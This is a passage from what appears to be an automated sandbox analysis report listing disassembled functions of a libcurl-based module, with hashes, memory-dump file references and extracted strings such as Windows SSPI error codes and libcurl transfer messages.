                                                                                                                                                                                                  • Opcode ID: 79225bff42c7f3756b2e0ba69c6c5bc578440328a4eb359beb1b3191571fa22f
                                                                                                                                                                                                  • Instruction ID: c88a5c9417a62b007ba4f687a8ec2116302feca50109b7352525bb271592f6f3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79225bff42c7f3756b2e0ba69c6c5bc578440328a4eb359beb1b3191571fa22f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99014026A18B42C5EA619F19A4411BD23A5BF88FD5F840031DB4E067A4EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE5E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_CONTEXT_EXPIRED
                                                                                                                                                                                                  • API String ID: 3939687465-1358876214
                                                                                                                                                                                                  • Opcode ID: 61983125f33651b5802577ff577e31b0029aa78b3f8dc3bb7d7398845e948f08
                                                                                                                                                                                                  • Instruction ID: da22dafda9f3e837ca7aacab03d8034e6c9c35866609c98dff9ccd706d66fd1e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61983125f33651b5802577ff577e31b0029aa78b3f8dc3bb7d7398845e948f08
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7015226A1CB42C5FA619F59B4411BD23A5BF88FD5F840031DB4E067B0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE5D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_CERT_WRONG_USAGE
                                                                                                                                                                                                  • API String ID: 3939687465-3896346274
                                                                                                                                                                                                  • Opcode ID: c523917cea4f88baa68328a1d349acba4bc64ba1872f12e598f7fb40ba3a4714
                                                                                                                                                                                                  • Instruction ID: d18fbae2aa40d3075feac6994a01b414f618c5666e6d4667025e5a4f7b7ff4d3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c523917cea4f88baa68328a1d349acba4bc64ba1872f12e598f7fb40ba3a4714
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB015226A1CB42C5FA619F19B4411BD23A5BF88FD5F840031DB4E067B0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE5C8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_CERT_UNKNOWN
                                                                                                                                                                                                  • API String ID: 3939687465-169894802
                                                                                                                                                                                                  • Opcode ID: 18d95ea0c812e77af67839231a605aeb101d50a50e151c44ca4e4bce1f7a0bf6
                                                                                                                                                                                                  • Instruction ID: 3d2d2c356860bf6567d5ba12ae9feb6904a79695324103f086d2ad3185590adc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18d95ea0c812e77af67839231a605aeb101d50a50e151c44ca4e4bce1f7a0bf6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB015226A1CB42C5FA619F29B4411BD23A5BF88FD5F840031DB4E067B0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE5BF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_CERT_EXPIRED
                                                                                                                                                                                                  • API String ID: 3939687465-3192465694
                                                                                                                                                                                                  • Opcode ID: 441da43cf9e542e5edd50b273512c7b9ea22a4b41436016054700c454272f4ae
                                                                                                                                                                                                  • Instruction ID: 718ea4742d3016d40ecb737e771d413784957f54e2c1cc3c8d5e04fd966a3c51
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 441da43cf9e542e5edd50b273512c7b9ea22a4b41436016054700c454272f4ae
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B014026A18B42C5EA619F19B4411BD23A5BF88FD5F840031DB4E067A0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE5B6 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_CANNOT_PACK
                                                                                                                                                                                                  • API String ID: 3939687465-1144097955
                                                                                                                                                                                                  • Opcode ID: b67d73a2223d1d1db4298fc8e6e3aa8c67cbe50cf565ce810dca4f246a39bc46
                                                                                                                                                                                                  • Instruction ID: 40264d7c30217c32770f61c36f0bfc3640fea4cb4e8ea74670450278562939dd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b67d73a2223d1d1db4298fc8e6e3aa8c67cbe50cf565ce810dca4f246a39bc46
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC015226A1CB42C5FA659F19B4411BD23A5BF88FD5F841031DB4E067B0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE5AD Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_CANNOT_INSTALL
                                                                                                                                                                                                  • API String ID: 3939687465-3689135316
                                                                                                                                                                                                  • Opcode ID: 50d27433e9ce647bc4f9590cf387356ba4aeaa3a2d0b820b697123033eebe261
                                                                                                                                                                                                  • Instruction ID: 40637b3f30517fea1d02668fd68ca18cc635d0864107615b2aa11cfe2086e9ef
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50d27433e9ce647bc4f9590cf387356ba4aeaa3a2d0b820b697123033eebe261
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4015226A1CB42C5FA619F19B4411BD23A5BF88FD5F840031DB4E067B4EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE5A4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_BUFFER_TOO_SMALL
                                                                                                                                                                                                  • API String ID: 3939687465-3213503683
                                                                                                                                                                                                  • Opcode ID: f0a99ce0059c141c48ec04eda93cf9f360708583881361bae81ebbd9556a3f0d
                                                                                                                                                                                                  • Instruction ID: 0c1b96c0dc662fd87de56fbab330e47d370822a69196780fdca0df4cf8c1833b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0a99ce0059c141c48ec04eda93cf9f360708583881361bae81ebbd9556a3f0d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5015226A1CB42C5FA619F19B4411BD23A5BF88FD5F844031DB4E067B0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE59B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_BAD_PKGID
                                                                                                                                                                                                  • API String ID: 3939687465-428854770
                                                                                                                                                                                                  • Opcode ID: e4821e884ca1c9353c5073079b8e784af184d8bf8c5e6d8cf8b8576c186c9ca4
                                                                                                                                                                                                  • Instruction ID: e77c25fc1c8dc341b8c300677bc84301e62f0ef7abfefb3961758ffdcf185a6b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4821e884ca1c9353c5073079b8e784af184d8bf8c5e6d8cf8b8576c186c9ca4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0015226A1CB42C5FA619F19B4411BD23A5BF88FD5F840031DB4E067B0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE592 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_BAD_BINDINGS
                                                                                                                                                                                                  • API String ID: 3939687465-4193802906
                                                                                                                                                                                                  • Opcode ID: 4ae39aaba354ca312d6457255954bcf7a71cb4e06a228ebbb92d9d27a1cbc1c8
                                                                                                                                                                                                  • Instruction ID: 42af3f3ac937524753e45c886240e7030efe886e22b2f812d1319521ea1d809c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ae39aaba354ca312d6457255954bcf7a71cb4e06a228ebbb92d9d27a1cbc1c8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B015226A1CB42C5FA619F19B4411BD23A5BF88FD5F840031DB4E067B0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE548 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_ALGORITHM_MISMATCH
                                                                                                                                                                                                  • API String ID: 3939687465-3091687665
                                                                                                                                                                                                  • Opcode ID: 25c386bd488f808c3cfea18c7eaafe3f10b4d0589020745c7e9fd4b935c226b7
                                                                                                                                                                                                  • Instruction ID: 81f6a8db76db8267e40d13cec3157c1abf5ea1fd5aa7df47f72a4fb6bd37be15
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25c386bd488f808c3cfea18c7eaafe3f10b4d0589020745c7e9fd4b935c226b7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC015236A18B02C5EA619F29B4512BD33A5BF88FD5F840031DB4E067A0EE3CE589C710
                                                                                                                                                                                                  Function 00007FF8B7E98030 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: attempt to borrow xfer_buf when already borrowed$could not allocate xfer_buf of %zu bytes$transfer buffer size is 0$transfer has no multi handle
                                                                                                                                                                                                  • API String ID: 0-2388664328
                                                                                                                                                                                                  • Opcode ID: d70d1101fa42ad8106897aba029665d5fa52da5cf362de0cce089e18a048d5f1
                                                                                                                                                                                                  • Instruction ID: bf11a887d7e14e06bb5d34e2abad11cf4afad9698693a98ad62ba23043ebefef
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d70d1101fa42ad8106897aba029665d5fa52da5cf362de0cce089e18a048d5f1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2441F922A08B8281EBA08F5AE8503BD37A0EB84FC4F188472DB5E5B765DF3CD495C340
                                                                                                                                                                                                  Function 00007FF8B7EBFDD0 Relevance: 9.1, APIs: 6, Instructions: 66encryptionCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$CertCloseStore
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 899430957-0
                                                                                                                                                                                                  • Opcode ID: 6e14b1c510b87c549e5761cb06657a077f6e268d51c93029928815c3de9d7ec8
                                                                                                                                                                                                  • Instruction ID: 5172b032d490bb9c7e7987dff3f9eb3652b5d8cbde4e1d2fb982807a44e4b264
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e14b1c510b87c549e5761cb06657a077f6e268d51c93029928815c3de9d7ec8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5231C536609F8186EB549FAAE99013C37A4FF48F98B580525CB4E47B29CF3CE495C354
                                                                                                                                                                                                  Function 00007FF8B7E6C530 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 232COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: haproxy protocol not support with SSL encryption in place (QUIC?)$unsupported transport type %d
                                                                                                                                                                                                  • API String ID: 0-551583306
                                                                                                                                                                                                  • Opcode ID: 268693fd3f8a3a606911690756d847c01c771880176c6ba25503136bcbd68dea
                                                                                                                                                                                                  • Instruction ID: 8879a005fc7cd949b2242900b79a574f49d03361f49030c076b455def93d8647
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 268693fd3f8a3a606911690756d847c01c771880176c6ba25503136bcbd68dea
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFA167A6A0978682EB658B29A84437D2B90AF45FC4F484036DF4D4B3F9DF2CF885C744
                                                                                                                                                                                                  Function 00007FF8B7EB62C0 Relevance: 7.6, APIs: 5, Instructions: 120COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
